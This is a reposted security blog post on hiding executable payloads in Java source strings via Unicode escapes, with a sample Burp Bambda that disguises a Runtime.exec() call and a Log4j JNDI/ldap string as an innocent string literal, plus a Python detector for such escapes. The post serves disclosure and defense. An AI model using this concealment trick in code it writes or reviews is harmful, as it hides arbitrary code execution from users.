Hiding payloads in Java source code strings

In this post we’ll show you how Java handles unicode escapes in source code strings in a way you might find surprising – and how you can abuse them to conceal payloads.

We recently released a powerful new feature called Bambdas. They allow you to filter items in Burp using Java code. But that got us wondering: what if you could convince a user to run a Bambda that looked like an honest exploit payload but actually executed arbitrary code on the local machine?

What do you expect would happen when you use the following in a Bambda:

var log4jpayload = "%24%7Bndi:ldap://psres.net/\u0022;Runtime.getRuntime().exec(\u0022open -a calculator\u0022);//%7D";
return requestResponse.request().contains(log4jpayload, false)

If you were expecting a simple string assignment you'd be wrong. What actually happens is that the Java compiler translates the Unicode-escaped double quote (\u0022) into a real double quote before the source is tokenised, so it closes the string literal early. The remainder of the line is then compiled as ordinary Java: Runtime.getRuntime().exec() runs with the command that follows, whose own quotes are also supplied as Unicode escapes. Java pretty much allows you to encode the entire syntax with Unicode escapes!
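As an added example (not code from the original post or from Burp), this Python replicates the escape-translation phase the Java compiler applies before tokenising, including the rule that only a backslash preceded by an even number of backslashes starts an escape and that any number of u's is allowed. It then flags escapes that decode to printable ASCII or line terminators, which is a practical way to vet a Bambda from an untrusted source before running it; the sample input is the snippet from the post above.

```python
import re

# Java Language Specification 3.3: a Unicode escape is a backslash, one or more
# 'u', then exactly four hex digits. The escape is only recognised when the
# backslash is preceded by an even number of contiguous backslashes.
_ESCAPE = re.compile(r'\\u+([0-9A-Fa-f]{4})')


def _iter_escapes(src):
    """Yield (start, end, decoded_char) for every eligible Unicode escape."""
    i, n = 0, len(src)
    while i < n:
        if src[i] != '\\':
            i += 1
            continue
        j = i
        while j < n and src[j] == '\\':
            j += 1
        # Only the last backslash of the run src[i:j] can start an escape, and
        # only if it is preceded by an even number of them (run length is odd).
        m = _ESCAPE.match(src, j - 1)
        if (j - i) % 2 == 1 and m:
            yield j - 1, m.end(), chr(int(m.group(1), 16))
            i = m.end()
        else:
            i = j


def translate_unicode_escapes(src):
    """Return the source as javac sees it after Unicode escape translation.
    The decoded character does not take part in further escape processing."""
    out, pos = [], 0
    for start, end, ch in _iter_escapes(src):
        out.append(src[pos:start])
        out.append(ch)
        pos = end
    out.append(src[pos:])
    return ''.join(out)


def find_suspicious_escapes(src):
    """Escapes decoding to printable ASCII or a line terminator rarely have a
    legitimate purpose and can change how the source tokenises; report them."""
    return [(start, src[start:end], ch) for start, end, ch in _iter_escapes(src)
            if ch in '\r\n' or 0x20 <= ord(ch) <= 0x7E]


# Sample Bambda source, constructed from the snippet shown in the post.
BAMBDA = (
    'var log4jpayload = "%24%7Bndi:ldap://psres.net/\\u0022;'
    'Runtime.getRuntime().exec(\\u0022open -a calculator\\u0022);//%7D";\n'
    'return requestResponse.request().contains(log4jpayload, false);'
)

if __name__ == '__main__':
    for offset, text, ch in find_suspicious_escapes(BAMBDA):
        print(f'offset {offset}: {text} decodes to {ch!r}')
    print(translate_unicode_escapes(BAMBDA))
```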

We couldn't find this technique publicly documented anywhere, but if you liked this you can find a bunch of related attacks in this paper.

Remember that a Bambda allows arbitrary code execution, so when using one from an untrusted source make sure you validate it before running it!

Originally published by Gareth Heyes: Hiding payloads in Java source code strings

Copyright notice: posted by admin on 24 January 2024 at 10:31 AM.
When reprinting, please credit: Hiding payloads in Java source code strings | CTF导航